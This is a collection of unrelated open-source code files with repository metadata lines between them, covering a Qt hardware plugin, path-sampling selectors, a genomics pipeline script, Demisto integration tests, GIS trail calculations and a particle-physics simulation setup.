super(MotorPositionLabel, self).setText(text)
class MotorizedLinearPoti(COMCUPluginBase):
def __init__(self, *args):
super().__init__(BrickletMotorizedLinearPoti, *args)
self.mp = self.device
self.cbe_position = CallbackEmulator(self,
self.mp.get_position,
None,
self.cb_position,
self.increase_error_count)
self.current_position = CurveValueWrapper()
self.slider = QSlider(Qt.Horizontal)
self.slider.setRange(0, 100)
self.slider.setMinimumWidth(200)
self.slider.setEnabled(False)
plots = [('Potentiometer Position', Qt.red, self.current_position, str)]
self.plot_widget = PlotWidget('Position', plots, extra_key_widgets=[self.slider],
update_interval=0.025, y_resolution=1.0)
self.motor_slider = QSlider(Qt.Horizontal)
self.motor_slider.setRange(0, 100)
self.motor_slider.valueChanged.connect(self.motor_slider_value_changed)
self.motor_hold_position = QCheckBox("Hold Position")
self.motor_drive_mode = QComboBox()
self.motor_drive_mode.addItem('Fast')
self.motor_drive_mode.addItem('Smooth')
def get_motor_slider_value():
return self.motor_slider.value()
self.motor_hold_position.stateChanged.connect(lambda x: self.motor_slider_value_changed(get_motor_slider_value()))
self.motor_drive_mode.currentIndexChanged.connect(lambda x: self.motor_slider_value_changed(get_motor_slider_value()))
self.motor_position_label = MotorPositionLabel('Motor Target Position:')
hlayout = QHBoxLayout()
hlayout.addWidget(self.motor_position_label)
hlayout.addWidget(self.motor_slider)
hlayout.addWidget(self.motor_drive_mode)
hlayout.addWidget(self.motor_hold_position)
line = QFrame()
line.setObjectName("line")
line.setFrameShape(QFrame.HLine)
line.setFrameShadow(QFrame.Sunken)
layout = QVBoxLayout(self)
layout.addWidget(self.plot_widget)
layout.addWidget(line)
layout.addLayout(hlayout)
def start(self):
async_call(self.mp.get_motor_position, None, self.get_motor_position_async, self.increase_error_count)
self.cbe_position.set_period(25)
self.plot_widget.stop = False
def stop(self):
self.cbe_position.set_period(0)
self.plot_widget.stop = True
def destroy(self):
pass
@staticmethod
def has_device_identifier(device_identifier):
return device_identifier == BrickletMotorizedLinearPoti.DEVICE_IDENTIFIER
def cb_position(self, position):
self.current_position.value = position
self.slider.setValue(position)
def get_motor_position_async(self, motor):
self.motor_slider.blockSignals(True)
self.motor_hold_position.blockSignals(True)
self.motor_drive_mode.blockSignals(True)
self.motor_hold_position.setChecked(motor.hold_position)
self.motor_drive_mode.setCurrentIndex(motor.drive_mode)
self.motor_position_label.setText(str(motor.position))
self.motor_slider.setValue(motor.position)
self.motor_slider.blockSignals(False)
self.motor_hold_position.blockSignals(False)
self.motor_drive_mode.blockSignals(False)
def motor_slider_value_changed(self, position):
self.motor_position_label.setText(str(position))
self.mp.set_motor_position(self.motor_slider.value(), self.motor_drive_mode.currentIndex(), self.motor_hold_position.isChecked())
| gpl-2.0 | -8,878,518,259,202,620,000 | 38.548872 | 137 | 0.687833 | false | 3.833819 | false | false | false |
openpathsampling/openpathsampling | openpathsampling/shooting.py | 2 | 7855 | import math
import logging
import numpy as np
from openpathsampling.netcdfplus import StorableNamedObject
from openpathsampling import default_rng
logger = logging.getLogger(__name__)
init_log = logging.getLogger('openpathsampling.initialization')
class ShootingPointSelector(StorableNamedObject):
def __init__(self):
# Assign rng, so it can be set to something else
self._rng = default_rng()
super(ShootingPointSelector, self).__init__()
def f(self, snapshot, trajectory):
"""
Returns the unnormalized proposal probability of a snapshot
Notes
-----
        In principle this is a collective variable, so we could easily add
        caching if useful.
"""
return 1.0
def probability(self, snapshot, trajectory):
sum_bias = self.sum_bias(trajectory)
if sum_bias > 0.0:
return self.f(snapshot, trajectory) / sum_bias
else:
return 0.0
def probability_ratio(self, snapshot, old_trajectory, new_trajectory):
p_old = self.probability(snapshot, old_trajectory)
p_new = self.probability(snapshot, new_trajectory)
return p_new / p_old
def _biases(self, trajectory):
"""
Returns a list of unnormalized proposal probabilities for all
snapshots in trajectory
"""
return [self.f(s, trajectory) for s in trajectory]
def sum_bias(self, trajectory):
"""
        Returns the unnormalized proposal probability of a trajectory.
This is just the sum of all proposal probabilities in a trajectory.
Notes
-----
For a uniform distribution this is proportional to the length of the
trajectory. In this case we can estimate the maximal accepted
trajectory length for a given acceptance probability.
After we have generated a new trajectory the acceptance probability
only for the non-symmetric proposal of different snapshots is given
by `probability(old_trajectory) / probability(new_trajectory)`
"""
return sum(self._biases(trajectory))
def pick(self, trajectory):
"""
Returns the index of the chosen snapshot within `trajectory`
Notes
-----
        The native implementation is very slow. Subclasses with a simple
        picking algorithm should override this function.
"""
prob_list = self._biases(trajectory)
sum_bias = sum(prob_list)
rand = self._rng.random() * sum_bias
idx = 0
prob = prob_list[0]
while prob <= rand and idx < len(prob_list):
idx += 1
prob += prob_list[idx]
return idx
class GaussianBiasSelector(ShootingPointSelector):
r"""
A selector that biases according to a Gaussian along specified
:class:`.CollectiveVariable`, with mean ``l_0`` and width parameter
``alpha``. That is, for snapshot :math:`x` and CV :math:`\lambda`, the
selection probability for each frame is weighted according to the
function
.. math::
P_\text{sel}(x) \propto \exp(-\alpha (\lambda(x) - l_0)^2)
Note that normalization here depends on the trajectory that the
snapshot is a part of: the sum of the probabilities for all frames
is 1, which gives a different normalization constant than the standard
Gaussian distribution normalization, and exact probabilities for
selecting a given snapshot will change depending on the trajectory it is
a part of.
Parameters
----------
collectivevariable : :class:`.CollectiveVariable`
the axis to use for the Gaussian
alpha : float
the width of the Gaussian
l_0 : float
the center of the Gaussian
"""
def __init__(self, collectivevariable, alpha=1.0, l_0=0.5):
super(GaussianBiasSelector, self).__init__()
self.collectivevariable = collectivevariable
self.alpha = alpha
self.l_0 = l_0
def f(self, snapshot, trajectory):
l_s = self.collectivevariable(snapshot)
return math.exp(-self.alpha * (l_s - self.l_0) ** 2)
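    # Illustrative example (numbers assumed, not taken from the original
    # code): with alpha=1.0 and l_0=0.5, a frame whose CV value is 0.7 is
    # weighted exp(-1.0 * (0.7 - 0.5) ** 2) = exp(-0.04) ~ 0.96, while a
    # frame at 1.5 is weighted exp(-1.0) ~ 0.37, so frames near l_0 are
    # proposed more often than frames far from it.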
class BiasedSelector(ShootingPointSelector):
"""General biased shooting point selector
Takes any function (wrapped in an OPS CV) and uses that as the bias for
selecting the shooting point.
Parameters
----------
func : :class:`.CollectiveVariable`
A function wrapped in an OPS CV which gives the relative bias.
"""
def __init__(self, func):
super(BiasedSelector, self).__init__()
self.func = func
def f(self, snapshot, trajectory):
return self.func(snapshot)
class UniformSelector(ShootingPointSelector):
"""
    Selects a random frame in the range `pad_start` to `len(trajectory)-pad_end`.
Attributes
----------
pad_start : int
number of frames at beginning of trajectory to be excluded from
selection
pad_end : int
number of frames at end of trajectory to be excluded from selection
"""
def __init__(self, pad_start=1, pad_end=1):
super(UniformSelector, self).__init__()
self.pad_start = pad_start
self.pad_end = pad_end
def f(self, frame, trajectory=None):
return 1.0
def sum_bias(self, trajectory):
return float(len(trajectory) - self.pad_start - self.pad_end)
def pick(self, trajectory):
idx = self._rng.integers(self.pad_start,
len(trajectory) - self.pad_end)
return idx
class InterfaceConstrainedSelector(ShootingPointSelector):
"""
Selects first frame outside of volume.
Parameters
----------
volume : :class:`.Volume`
defines Volume for which the first frame outside of this interface
volume is found
"""
def __init__(self, volume):
super(InterfaceConstrainedSelector, self).__init__()
self.volume = volume
def f(self, frame, trajectory=None):
idx = trajectory.index(frame)
if idx == self.pick(trajectory):
return 1.0
else:
return 0.0
def sum_bias(self, trajectory):
return 1.0
def pick(self, trajectory):
for idx, frame in enumerate(trajectory):
if not self.volume(frame):
break
if idx == len(trajectory)-1 and self.volume(frame):
raise RuntimeError("Interface constrained shooting move did "
" not find valid crossing point")
return idx
class FinalFrameSelector(ShootingPointSelector):
"""
Pick final trajectory frame as shooting point.
This is used for "forward" extension in, e.g., the minus move.
"""
def f(self, frame, trajectory):
if trajectory.index(frame) == len(trajectory) - 1:
return 1.0
else:
return 0.0
def pick(self, trajectory):
return len(trajectory)-1
def probability(self, snapshot, trajectory): # pragma: no cover
return 1.0 # there's only one choice
def probability_ratio(self, snapshot, old_trajectory, new_trajectory):
# must be matched by a final-frame selector somewhere
return 1.0
class FirstFrameSelector(ShootingPointSelector):
"""
Pick first trajectory frame as shooting point.
This is used for "backward" extension in, e.g., the minus move.
"""
def f(self, frame, trajectory):
if trajectory.index(frame) == 0:
return 1.0
else:
return 0.0
def pick(self, trajectory):
return 0
def probability(self, snapshot, trajectory): # pragma: no cover
return 1.0 # there's only one choice
def probability_ratio(self, snapshot, old_trajectory, new_trajectory):
# must be matched by a first-frame selector somewhere
return 1.0
| mit | -6,294,389,502,952,380,000 | 29.445736 | 76 | 0.629663 | false | 4.390721 | false | false | false |
iskandr/cohort-seq2hla | cohort-seq2hla.py | 1 | 5885 |
# Copyright (c) 2015. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from glob import glob
import logging
from os.path import join, exists, isdir
from os import listdir
import subprocess
parser = argparse.ArgumentParser()
parser.add_argument(
"--base-dir",
default="/hdfs/datasets/martignetti_ovarian/",
help="Directory which contains DNA & RNA samples for sample groups")
parser.add_argument(
"--rna-subdir",
default=join(
"Illumina_RNA",
"QC_S106.B202_PCT189_RNA.PE.RNASeqRibozero.RAPiD.Human"),
help="Subdirectory which contains all RNA samples in a group")
parser.add_argument(
"--rna-fastq-subdir",
default="Raw/RNA.IlluminaHiSeq2500.RiboZero/",
help="Within a particular RNA sample's dir, where are the FASTQ files")
parser.add_argument(
"--left-reads-pattern",
default="*_R1_*.fastq.gz",
help="Wildcard pattern for FASTQ files containing left reads of mate-pairs")
parser.add_argument(
"--right-reads-pattern",
default="*_R2_*.fastq.gz",
help="Wildcard pattern for FASTQ files containing left reads of mate-pairs")
parser.add_argument(
"--seq2hla-path",
default="../seq2hla/seq2HLA.py",
help="Where is the seq2HLA repository located?")
parser.add_argument(
"--temp-fastq-dir",
default=".",
help="Dir for concatenated FASTQ's (seq2HLA can't handle multiple lanes)")
args = parser.parse_args()
def paths_from_pattern(base_dir, pattern):
full_pattern = join(base_dir, pattern)
paths = [
join(base_dir, filename)
for filename in glob(full_pattern)
]
if len(paths) == 0:
raise ValueError("No FASTQ files found for %s" % full_pattern)
return paths
def concat_compressed_fastq_files(
group_name,
sample_name,
suffix,
fastq_paths,
target_dir):
"""
    Returns (combined_fastq_path, process) so multiple concat jobs can be
    started simultaneously; callers should wait() on the process before
    using the combined file.
"""
combined_fastq_name = "%s_%s_%s.fastq" % (
group_name,
sample_name,
suffix)
combined_fastq_path = join(target_dir, combined_fastq_name)
logging.info(
"Combining %d FASTQ files into %s",
len(fastq_paths),
combined_fastq_path)
with open(combined_fastq_path, 'w') as output_file:
process = subprocess.Popen(
args=["zcat"] + fastq_paths,
stdout=output_file)
return combined_fastq_path, process
if __name__ == "__main__":
if not exists(args.base_dir):
raise ValueError("Directory '%s' does not exist" % args.base_dir)
# dictionary mapping sample group names to directory paths
group_paths = {}
for group_name in listdir(args.base_dir):
group_path = join(args.base_dir, group_name)
if isdir(group_path):
logging.info("Sample group %s => %s", group_name, group_path)
group_paths[group_name] = group_path
# dictionary mapping (group_name, sample_name) pairs full paths
sample_paths = {}
for (group_name, group_path) in group_paths.items():
rna_path = join(group_path, args.rna_subdir)
if not exists(rna_path):
raise ValueError(
"Missing RNA subdirectory for sample group %s, expected %s" % (
group_name, rna_path))
for sample_name in listdir(rna_path):
sample_path = join(rna_path, sample_name)
if isdir(sample_path):
logging.info("Sample %s:%s => %s",
group_name,
sample_name,
sample_path)
sample_paths[(group_name, sample_name)] = sample_path
for ((group_name, sample_name), sample_path) in sample_paths.items():
logging.info("Looking for FASTQ files for %s:%s" % (
group_name, sample_name))
fastq_path = join(sample_path, args.rna_fastq_subdir)
if not exists(fastq_path):
raise ValueError("Missing FASTQ subdirectory '%s' for %s:%s" % (
fastq_path,
group_name,
sample_name))
left_fastq_paths = paths_from_pattern(
fastq_path,
args.left_reads_pattern)
left_combined_fastq_path, p_left = concat_compressed_fastq_files(
group_name=group_name,
sample_name=sample_name,
suffix="R1",
fastq_paths=left_fastq_paths,
target_dir=args.temp_fastq_dir)
right_fastq_paths = paths_from_pattern(
fastq_path,
args.right_reads_pattern)
right_combined_fastq_path, p_right = concat_compressed_fastq_files(
group_name=group_name,
sample_name=sample_name,
suffix="R2",
fastq_paths=right_fastq_paths,
target_dir=args.temp_fastq_dir)
if p_left.wait() != 0:
raise ValueError("Concat of left reads failed")
if p_right.wait() != 0:
raise ValueError("Concat of right reads failed")
subprocess.check_call(
[
"python", args.seq2hla_path,
"-1", left_combined_fastq_path,
"-2", right_combined_fastq_path,
"-r", "%s_%s" % (group_name, sample_name)
]) | apache-2.0 | -1,169,457,863,651,158,800 | 33.421053 | 80 | 0.603398 | false | 3.746022 | false | false | false |
demisto/content | Packs/Gamma/Integrations/Gamma/Gamma_test.py | 1 | 13515 | import json
import pytest
import demistomock as demisto
from Gamma import Client, fetch_incidents, Command, main
MOCK_URL = "mock://fake-api.net"
MOCK_VIOLATION = {
"response": [{
"app_name": "jira",
"dashboard_url": f'{MOCK_URL}/violationId/2036',
"file_labels_map": {},
"text_labels": [],
"user": {
"active_directory_user_id": None,
"atlassian_account_id": None,
"email_address": None,
"github_handle": None,
"name": "Amane Suzuha",
"slack_user_id": None
},
"violation_category": "mock_category",
"violation_event_timestamp": 1605805555,
"violation_id": 2036,
"violation_status": "OPEN"
}]
}
MOCK_VIOLATION_2 = {
"response": [{
"app_name": "jira",
"dashboard_url": f'{MOCK_URL}/violationId/5100',
"file_labels_map": {},
"text_labels": [],
"user": {
"active_directory_user_id": None,
"atlassian_account_id": None,
"email_address": None,
"github_handle": None,
"name": "Rintaro Okabe",
"slack_user_id": None
},
"violation_category": "mock_category",
"violation_event_timestamp": 1605804455,
"violation_id": 5100,
"violation_status": "OPEN"
}]
}
MOCK_VIOLATION_2_UPDATED = {
"response": [{
"app_name": "jira",
"dashboard_url": f'{MOCK_URL}/violationId/5100',
"file_labels_map": {},
"text_labels": [],
"user": {
"active_directory_user_id": None,
"atlassian_account_id": None,
"email_address": None,
"github_handle": None,
"name": "Rintaro Okabe",
"slack_user_id": None
},
"violation_category": "mock_category",
"violation_event_timestamp": 1605804455,
"violation_id": 5100,
"violation_status": "RESOLVED"
}]
}
MOCK_ALL_VIOLATIONS = {
'response': [
MOCK_VIOLATION['response'][0],
MOCK_VIOLATION_2['response'][0]
]
}
def mock_demisto(mocker, args_value=None, command_value=None):
mocker.patch.object(demisto, "results")
mocker.patch.object(
demisto,
'params',
return_value={'api_key': 'thisisatestkey', 'url': MOCK_URL}
)
if not args_value:
args_value = {
"entryID": "entry_id",
"parseAll": "yes",
"codec": "utf-8"
}
if command_value:
mocker.patch.object(
demisto,
'command',
return_value=command_value
)
mocker.patch.object(demisto, "args", return_value=args_value)
def mock_client(mocker, demisto):
mocker.patch.object(
demisto,
'params',
return_value={'api_key': 'thisisatestkey', 'url': MOCK_URL}
)
client = Client(demisto)
return client
@pytest.mark.parametrize("last_run_violation,first_fetch_violation,max_results,output_1,output_2", [
({}, "1", "10", "Gamma Violation 2036", 5100),
({}, "1", "0", "Gamma Violation 2036", 5100),
({}, "1", "-1", "Gamma Violation 2036", 5100),
({}, "1", "200", "Gamma Violation 2036", 5100)
])
def test_fetch_incidents(last_run_violation, first_fetch_violation, max_results,
output_1, output_2, requests_mock, mocker):
requests_mock.get(
MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_ALL_VIOLATIONS
)
# Test fetch
next_run, incidents = fetch_incidents(mock_client(mocker, demisto),
last_run_violation,
first_fetch_violation,
max_results)
mocker.patch.object(demisto, 'incidents', incidents)
assert output_1 == demisto.incidents[0]['name']
assert output_2 == next_run['starting_violation']
@pytest.mark.parametrize("next_run,first_fetch_violation,max_results,output_1,output_2", [
({'starting_violation': 2036}, "1", "10", 1, 5100),
({'starting_violation': 5100}, "1", "10", 0, 5100)
])
def test_fetch_incidents_next_fetch(next_run, first_fetch_violation, max_results,
output_1, output_2, requests_mock, mocker):
requests_mock.get(
MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_ALL_VIOLATIONS
)
next_run, incidents = fetch_incidents(mock_client(mocker, demisto),
next_run,
first_fetch_violation,
max_results)
assert output_1 == len(incidents)
assert output_2 == next_run['starting_violation']
@pytest.mark.parametrize("last_run_violation,first_fetch_violation,max_results,output", [
({}, "0", "10", "first_fetch_violation must be equal to 1 or higher"),
({}, "-1", "10", "first_fetch_violation must be equal to 1 or higher"),
({}, "test", "10", "first_fetch_violation and max_limit must be integers"),
({}, "1", "test", "first_fetch_violation and max_limit must be integers"),
])
def test_fetch_incidents_bad_input(last_run_violation, first_fetch_violation,
max_results, output, mocker):
with pytest.raises(ValueError) as err:
fetch_incidents(mock_client(mocker, demisto),
last_run_violation,
first_fetch_violation,
max_results)
assert output == str(err.value)
def test_get_violation_command(requests_mock, mocker, capfd):
requests_mock.get(
MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_VIOLATION
)
args = {"violation": "2036"}
mock_demisto(mocker, args, 'gamma-get-violation')
with capfd.disabled():
main()
content = demisto.results.call_args[0][0]['Contents'][0]['violation_id']
assert 2036 == content
@pytest.mark.parametrize("demisto_args,output", [
({"violation": "0"}, "Violation must be greater than 0"),
({"violation": "-1"}, "Violation must be greater than 0"),
({"violation": "test"}, "invalid literal for int() with base 10: 'test'"),
])
def test_get_violation_command_bad_input(demisto_args, output, mocker):
client = mock_client(mocker, demisto)
with pytest.raises(ValueError) as err:
Command.get_violation(client, demisto_args)
assert output == str(err.value)
@pytest.mark.parametrize("demisto_args,output", [
({"minimum_violation": "2036", "limit": "2"}, 2036),
({"minimum_violation": "2035", "limit": "2"}, 2036),
])
def test_get_violation_list_command(demisto_args, output, requests_mock, mocker, capfd):
requests_mock.get(MOCK_URL + "/api/discovery/v1/violation/list", json=MOCK_ALL_VIOLATIONS)
mock_demisto(mocker, demisto_args, "gamma-get-violation-list")
with capfd.disabled():
main()
content = demisto.results.call_args[0][0]['Contents'][0]['violation_id']
assert output == content
@pytest.mark.parametrize("demisto_args,output", [
({"minimum_violation": "0", "limit": "2"}, "minimum_violation must be greater than 0"),
({"minimum_violation": "test", "limit": "2"}, "invalid literal for int() with base 10: 'test'"),
({"minimum_violation": "-1", "limit": "2"}, "minimum_violation must be greater than 0"),
({"minimum_violation": "2035", "limit": "0"}, "limit must be between 1 and 100"),
({"minimum_violation": "2035", "limit": "-1"}, "limit must be between 1 and 100"),
({"minimum_violation": "2035", "limit": "test"},
"invalid literal for int() with base 10: 'test'"),
])
def test_get_violation_list_command_bad_input(demisto_args, output, mocker):
client = mock_client(mocker, demisto)
with pytest.raises(ValueError) as err:
Command.get_violation_list(client, demisto_args)
assert output == str(err.value)
@pytest.mark.parametrize("demisto_args,demisto_command,output", [
(
{"violation": "5100", "status": "resolved", "notes": "This has been updated!"},
"gamma-update-violation",
'RESOLVED',
),
])
def test_update_violation_command(demisto_args, demisto_command, output,
requests_mock, mocker, capfd):
test_violation = 5100
requests_mock.put(MOCK_URL + f'/api/discovery/v1/violation/{test_violation}',
json=MOCK_VIOLATION_2)
requests_mock.get(MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_VIOLATION_2_UPDATED)
mock_demisto(mocker, demisto_args, demisto_command)
with capfd.disabled():
main()
contents = demisto.results.call_args[0][0]['Contents'][0]['violation_status']
assert output == contents
@pytest.mark.parametrize("demisto_args,output", [
(
{"violation": "0", "status": "resolved", "notes": "This has been updated!"},
"Violation must be greater than 0"
),
(
{"violation": "-1", "status": "resolved", "notes": "This has been updated!"},
"Violation must be greater than 0"
),
(
{"violation": "test", "status": "resolved", "notes": "This has been updated!"},
"invalid literal for int() with base 10: 'test'"
),
(
{"violation": "5100", "status": "closed", "notes": "This has been updated!"},
"Status must be one of the following: OPEN, RESOLVED, IGNORED"
),
])
def test_update_violation_command_bad_input(demisto_args, output, mocker):
client = mock_client(mocker, demisto)
with pytest.raises(ValueError) as err:
Command.update_violation(client, demisto_args)
assert output == str(err.value)
@pytest.mark.parametrize("demisto_args,demisto_command,output_1,output_2", [
({}, "fetch-incidents", "Gamma Violation 2036", "Gamma Violation 5100"),
({'first_fetch_violation': "2036", 'max_results': "5"}, "fetch-incidents",
"Gamma Violation 2036", "Gamma Violation 5100"),
])
def test_main_fetch_incidents(demisto_args, demisto_command, output_1, output_2,
requests_mock, mocker, capfd):
# Test fetch
requests_mock.get(
MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_ALL_VIOLATIONS
)
mock_demisto(mocker, demisto_args, demisto_command)
with capfd.disabled():
main()
contents = json.loads(demisto.results.call_args[0][0]["Contents"])
assert output_1 == contents[0]["name"]
assert output_2 == contents[1]["name"]
def test_main_get_violation_list(requests_mock, mocker, capfd):
# Test fetch
requests_mock.get(
MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_ALL_VIOLATIONS
)
args = {'minimum_id': "2036", 'limit': "5"}
command = 'gamma-get-violation-list'
mock_demisto(mocker, args, command)
with capfd.disabled():
main()
response = demisto.results.call_args[0][0]["Contents"]
assert {2036, 5100} == {i["violation_id"] for i in response}
def test_main_get_bad_violation(mocker, requests_mock, capfd):
requests_mock.get(
MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_VIOLATION
)
# Test wrong ID
command = "gamma-get-violation"
args = {"violation": "5100"}
mock_demisto(mocker, args, command)
with pytest.raises(SystemExit):
with capfd.disabled():
main()
assert demisto.results.call_args[0][0]['Contents'] == "Failed to execute gamma-get-violation " \
"command.\nError:\nViolation with this " \
"ID does not exist."
def test_main_get_violation(requests_mock, mocker, capfd):
# Test get violation
requests_mock.get(
MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_VIOLATION
)
args = {'violation': "2036"}
command = 'gamma-get-violation'
mock_demisto(mocker, args, command)
with capfd.disabled():
main()
assert 2036 == demisto.results.call_args[0][0]["Contents"][0]["violation_id"]
def test_main_update(requests_mock, mocker, capfd):
# Test get violation
test_violation = 2036
requests_mock.put(
MOCK_URL + f"/api/discovery/v1/violation/{test_violation}",
json=MOCK_VIOLATION
)
requests_mock.get(
MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_VIOLATION
)
args = {'violation': f"{test_violation}", 'status': 'RESOLVED', 'notes': ''}
command = 'gamma-update-violation'
mock_demisto(mocker, args, command)
with capfd.disabled():
main()
assert test_violation == demisto.results.call_args[0][0]["Contents"][0]["violation_id"]
def test_bad_command(mocker, capfd):
test_violation = 2036
args = {'violation': f"{test_violation}", 'status': 'resolved', 'notes': ''}
command = 'gamma-violation-update'
mock_demisto(mocker, args, command)
with pytest.raises(SystemExit):
with capfd.disabled():
main()
assert demisto.results.call_args[0][0]['Contents'] == "Failed to execute " \
"gamma-violation-update " \
"command.\nError:\nCommand " \
"\"gamma-violation-update\" is not " \
"implemented."
| mit | -614,382,760,543,915,300 | 35.04 | 100 | 0.57943 | false | 3.459176 | true | false | false |
mvollmer/cockpit | bots/machine/machine_core/constants.py | 2 | 1177 | # -*- coding: utf-8 -*-
# This file is part of Cockpit.
#
# Copyright (C) 2013 Red Hat, Inc.
#
# Cockpit is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 2.1 of the License, or
# (at your option) any later version.
#
# Cockpit is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Cockpit; If not, see <http://www.gnu.org/licenses/>.
import os
# Images which are Atomic based
ATOMIC_IMAGES = ["rhel-atomic", "fedora-atomic", "continuous-atomic"]
MACHINE_DIR = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
BOTS_DIR = os.path.dirname(MACHINE_DIR)
TEST_DIR = os.path.join(os.path.dirname(BOTS_DIR), "test")
DEFAULT_IDENTITY_FILE = os.path.join(MACHINE_DIR, "identity")
TEST_OS_DEFAULT = "fedora-29"
DEFAULT_IMAGE = os.environ.get("TEST_OS", TEST_OS_DEFAULT)
| lgpl-2.1 | 5,782,083,369,937,720,000 | 36.967742 | 74 | 0.737468 | false | 3.324859 | false | false | false |
schocco/mds-web | apps/trails/gis_math.py | 1 | 5200 | from bisect import bisect
from django.contrib.gis.geos.point import Point
import math
def haversine(origin, destination):
'''
    :param origin: start position as a (lat, lon) pair in decimal degrees
    :param destination: end position as a (lat, lon) pair in decimal degrees
    :return: great-circle distance in meters
.. See::
http://www.movable-type.co.uk/scripts/gis-faq-5.1.html
'''
lat1, lon1 = origin
lat2, lon2 = destination
# Earth radius varies from 6356.752 km at the poles
# to 6378.137 km at the equator, use something in
# between.
radius = radius_for_lat(lat1) # m
dlat = math.radians(lat2-lat1)
dlon = math.radians(lon2-lon1)
a = math.sin(dlat/2) * math.sin(dlat/2) + math.cos(math.radians(lat1)) \
* math.cos(math.radians(lat2)) * math.sin(dlon/2) * math.sin(dlon/2)
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))
d = radius * c
return d
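# Illustrative usage (coordinates below are example values, not from the
# original module): haversine() expects (lat, lon) pairs in decimal degrees
# and returns metres, e.g.
#   haversine((52.2296756, 21.0122287), (52.406374, 16.9251681))
# is roughly 2.8e5, i.e. about 280 km between Warsaw and Poznan.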
def radius_for_lat(lat):
'''
Rt = radius of earth at latitude t
maxr = major radius of earth = 6,378,137 meters
minr = minor radius of earth = 6,356,752.31420 meters
    Rt = SQRT( ((maxr^2 * cos(t))^2 + (minr^2 * sin(t))^2) / ((maxr * cos(t))^2 + (minr * sin(t))^2) )
:return: radius for given latitude in m
.. See::
http://en.wikipedia.org/wiki/Earth_radius#Radius_at_a_given_geodetic_latitude
'''
maxr = 6378137.0 # m
minr = 6356752.0 # m
    t = math.radians(lat)
    d = (maxr**2 * math.cos(t))**2 + (minr**2 * math.sin(t))**2
    div = (maxr * math.cos(t))**2 + (minr * math.sin(t))**2
rlat = math.sqrt(d/div)
return rlat
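# Rough sanity check for the formula above: at the equator (lat = 0) the
# expression reduces to maxr (~6378137 m) and at the poles (lat = 90 degrees)
# it reduces to minr (~6356752 m); every other latitude falls between the two.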
class RasterRow:
"""
Representation of one data point of the rastered data.
"""
def __init__(self):
self.length_degree = 0
self.length_meters = 0
self.length_degree_cum = 0
self.length_meters_cum = 0
self.altitude = 0
self.slope = 0
class RasterMap:
'''
Class to calculate approximated information about a trail object.
Uses a few data points of the original data to speed up calculation.
'''
def __init__(self, trail):
#flatten multilinestring to linestring
self.linestring = [point for linestring in trail.waypoints for point in linestring]
self.length = trail.waypoints.length
self.length_m = trail.trail_length or 0
self.rasterRows = []
self.distances = [] #4th dimension of linestring with cumulative distance to the start point
self.build()
self.raster()
def build(self):
#calculate distance at each point in the linestring
b = Point(self.linestring[0])
distance_cum = 0
for p in self.linestring:
a = b
b = Point(p)
distance = a.distance(b)
distance_cum += distance
self.distances.append(distance_cum)
def raster(self):
'''
Divide a track into equally long sections and get the altitude at each point.
According to the MDS document a section is a part of the track of 5-20 meters.
'''
# the size of the segments should be chosen so that the calculation effort is not too cpu intensive
steps = 0
if self.length_m <= 1000:
#5m is the minimum section length according to the mds document
steps = self.length_m/5
elif self.length_m > 30000:
#50m segments for tracks longer than 30km
steps = self.length_m/50
elif self.length_m > 1000:
# use 20m segments for tracks between 1 and 30km
steps = self.length_m/20
row = None
for step in range(int(steps)):
prev_row = row
row = RasterRow()
row.length_degree = self.length / steps
row.length_degree_cum = row.length_degree * step
row.length_meters = self.length_m / steps
row.length_meters_cum = row.length_meters * step
if(row.length_degree_cum in self.distances):
row.altitude = self.linestring[self.distances.index(row.length_degree_cum)][2]
else:
# get index of element closest to the needed value
right_idx = bisect(self.distances, row.length_degree_cum)
# distances[i] is lower than the value, so i+1 is the right neighbour
left_idx = right_idx - 1
if(right_idx >= len(self.linestring)):
# the right index can be out of range
# in that case we can simply use the last value instead of interpolating
row.altitude = self.linestring[-1][2]
else:
# now interpolate
h0 = self.linestring[left_idx][2]
h1 = self.linestring[right_idx][2]
x0 = self.distances[left_idx]
x1 = self.distances[right_idx]
row.altitude = h0 + (h1-h0)/(x1-x0) * (row.length_degree_cum - x0)
self.rasterRows.append(row)
if(prev_row is not None and row.length_meters != 0):
row.slope = float((row.altitude - prev_row.altitude)/row.length_meters) | mit | 8,821,322,964,885,942,000 | 36.15 | 107 | 0.572885 | false | 3.698435 | false | false | false |
mice-software/maus | bin/simulate_mice.py | 1 | 2540 | #!/usr/bin/env python
"""
Simulate the MICE experiment
This will simulate MICE spills through the entirety of MICE using Geant4, then
digitize and reconstruct TOF and tracker hits to space points.
"""
import io # generic python library for I/O
import MAUS # MAUS libraries
def run():
""" Run the macro
"""
# This input generates empty spills, to be filled by the beam maker later on
my_input = MAUS.InputPySpillGenerator()
# Create an empty array of mappers, then populate it
# with the functionality you want to use.
my_map = MAUS.MapPyGroup()
# GEANT4
my_map.append(MAUS.MapPyBeamMaker()) # beam construction
my_map.append(MAUS.MapCppSimulation()) # geant4 simulation
# Pre detector set up
# my_map.append(MAUS.MapPyMCReconSetup()) # geant4 simulation
my_map.append(MAUS.MapCppMCReconSetup()) # geant4 simulation
# TOF
my_map.append(MAUS.MapCppTOFMCDigitizer()) # TOF MC Digitizer
my_map.append(MAUS.MapCppTOFSlabHits()) # TOF MC Slab Hits
my_map.append(MAUS.MapCppTOFSpacePoints()) # TOF Space Points
